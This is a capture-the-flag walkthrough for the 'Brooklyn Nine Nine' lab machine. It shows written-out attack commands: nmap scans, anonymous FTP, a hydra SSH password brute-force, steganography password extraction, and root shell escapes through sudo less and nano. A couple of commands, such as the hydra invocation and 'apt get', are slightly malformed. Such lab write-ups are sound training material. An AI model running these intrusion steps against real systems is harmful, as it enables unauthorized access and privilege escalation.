Brooklyn Nine Nine

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.146.230

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230

Enumeration

Port 21: FTP

Looks like we can login through ftp as anonymous, lets do that. (We use anonymous for both username and password or you can just hit enter for password)

ftp 10.10.146.230

Lets list the file in this directory

Looks like there is a file which is a note to a person called Jake, lets transfer this file to our machine and read what it has to say.

get note_to_jake.txt

Lets now read the file

Looks like Jake did not change his password as mentioned by a person called Amy. We also have a username Holt, we now have three usernames

Port 80: HTTP

Lets visit the website

Its a Brooklyn Nine Nine poster, lets look at the source code.

We have something interesting, they mention steganography, which is the practice of concealing a message within message. So lets download the image onto our machine, the name of the image is in the source code

wget http://10.10.146.230/brooklyn99.jpg

Exploitation

FTP

We can try to use hydra to find the password for Jake.

hydra -l jake -P /usr/share/wordlists/rockyou.txt http://10.10.146.230 ssh

We found the password, so lets login through ssh.

ssh jake@10.10.146.230

And we are logged in. We can find the user flag here.

HTTP

We can use a tool called stegcracker to find hidden messages within files. If you do not have it you can download it with this command

apt get install stegcracker

Now you can use stegcracker

stegcracker brooklyn99.jpg

We have the password, this can be the password for the file. Lets see what the file is hiding

steghide --extract -sf brooklyn99.jpg

Now we have the password for Holt, lets login through ssh.

ssh holt@10.10.146.230

Privilege Escalation

Jake

Lets run sudo -l to see what Jake can run as root.

sudo -l

Looks like we can run the less command, with which we can see contents of files, so lets run the command to check what /root/root.txt contains.

sudo /usr/bin/less /root/root.txt

We can also try to become root using the commands found in GTFOBins

Lets use these commands to become root.

sudo less /etc/profile
!/bin/sh

Holt

Lets run sudo -l to see what Holt can run as root.

sudo -l

We can nano as root, so lets go to GTFOBins to find the commands to escalate privilege's to root.

Lets run these commands

sudo nano
^R^X
reset; sh 1>&0 2>&0

We are now root. You can find the root flag in /root/

Last updated